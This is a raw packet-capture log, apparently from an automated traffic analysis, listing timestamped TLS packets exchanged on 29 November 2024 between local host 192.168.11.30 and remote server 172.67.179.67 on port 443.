                                                                                                            Nov 29, 2024 09:10:30.563950062 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.564198017 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.566113949 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.566190004 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.566332102 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.566333055 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.566395998 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.566421986 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.566452026 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.566699028 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.568639994 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.568713903 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.568855047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.568855047 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.568903923 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.568931103 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.569010973 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.569191933 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.571561098 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.571636915 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.571770906 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.572010040 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.572060108 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.572299004 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.574038029 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.574111938 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.574243069 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.574421883 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.574474096 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.574702978 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.576463938 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.576538086 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.576682091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.576683044 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.576740026 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.576849937 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.576909065 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.578963041 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.579039097 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.579231977 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.579231977 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.579286098 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.579309940 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.579523087 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.581563950 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.581636906 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.581808090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.581808090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.581808090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.581873894 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.581906080 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.582124949 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.584589005 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.584662914 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.584804058 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.584804058 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.584851980 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.584851980 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.584878922 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.584925890 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.585115910 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.587234974 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.587323904 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.587455034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.587455034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.587507963 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.587534904 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.587567091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.587802887 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.589337111 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.589437008 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.589570045 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.589570045 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.589628935 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.589647055 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.589945078 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.591603041 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.591687918 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.591909885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.591909885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.591964960 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.592168093 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.593846083 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.593929052 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.594047070 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.594186068 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.594239950 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.594485044 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.596379995 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.596462011 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.596636057 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.596761942 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.596812010 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.597029924 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.598587990 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.598668098 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.598795891 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.598797083 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.598944902 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.598997116 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.599198103 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.600881100 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.600965023 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.601128101 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.601129055 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.601129055 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.601188898 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.601212978 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.601351976 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.602999926 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.603080034 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.603235006 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.603235006 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.603235006 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.603235006 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.603300095 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.603513956 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.604999065 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.605079889 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.605232000 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.605324030 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.605353117 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.605544090 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.606806040 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.606889009 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.607012987 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.607012987 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.607074976 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.607100964 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.607127905 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.607281923 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.609096050 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.609173059 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.609291077 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.609291077 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.609355927 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.609355927 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.609385967 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.609421015 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.609568119 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.611449957 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.611532927 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.611689091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.611835003 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.611886024 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.612113953 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.612459898 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.612633944 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.612679958 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.612679958 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.612741947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.612770081 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.612915993 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.613059998 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.614434958 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.614516973 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.614650011 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.614790916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.614840984 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.615076065 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.616442919 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.616523981 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.616672993 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.616672993 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.616672993 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.616736889 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.616772890 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.616971016 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.618074894 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.618160963 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.618307114 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.618308067 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.618367910 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.618401051 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.618604898 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.619616985 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.619700909 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.619828939 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.619828939 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.619965076 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.620016098 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.620243073 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.621464014 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.621550083 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.621701002 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.621701002 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.621701002 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.621762037 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.621871948 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.622016907 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.623080015 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.623161077 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.623312950 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.623312950 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.623467922 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.623518944 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.623742104 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.624511003 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.624591112 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.624732971 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.624800920 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.624835014 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.625041962 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.626182079 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.626266003 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.626445055 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.626446009 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.626498938 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.626522064 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.626735926 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.634571075 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.634651899 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.634784937 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.634784937 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.634944916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.634994984 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.635078907 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.635200024 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.635649920 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.635669947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.635669947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.635669947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.635669947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.635720968 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.635751009 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.635828018 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.635999918 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.636321068 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.636394024 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.636607885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.636607885 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.636661053 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.636996031 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.637073040 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.637216091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.637269020 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.637288094 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.637722969 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.637789965 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.637932062 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.637984991 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.638019085 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.638019085 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.638376951 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.638456106 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.638577938 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.638577938 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.638631105 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.638654947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.638654947 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.638828993 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.639209986 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.639277935 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.639400959 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.639509916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.639509916 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.639565945 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.640197039 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.640372992 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.640427113 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.640460968 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.640665054 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.751780987 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.751966000 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.752031088 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.752207994 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.752260923 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.752279043 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.754134893 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.754215956 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.754420042 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.754420042 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.754420042 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.754479885 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.755147934 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.755224943 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.755377054 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.755377054 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.755433083 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.755474091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.755474091 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.756372929 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.756441116 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.756593943 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.756644964 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.756772995 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.757848978 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.757932901 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.758127928 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.758127928 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.758127928 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.758186102 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.758941889 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.759021997 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.759164095 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.759217024 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.759352922 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.760481119 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.760557890 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.760711908 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.760713100 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.760713100 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.760770082 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.760797024 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.761668921 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.761753082 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.761893034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.761944056 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.761976957 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.763000011 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.763077021 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.763251066 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.763251066 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.763308048 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.763330936 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.763396978 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:30.764122009 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.764202118 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:30.764329910 CET49761443192.168.11.30172.67.179.67
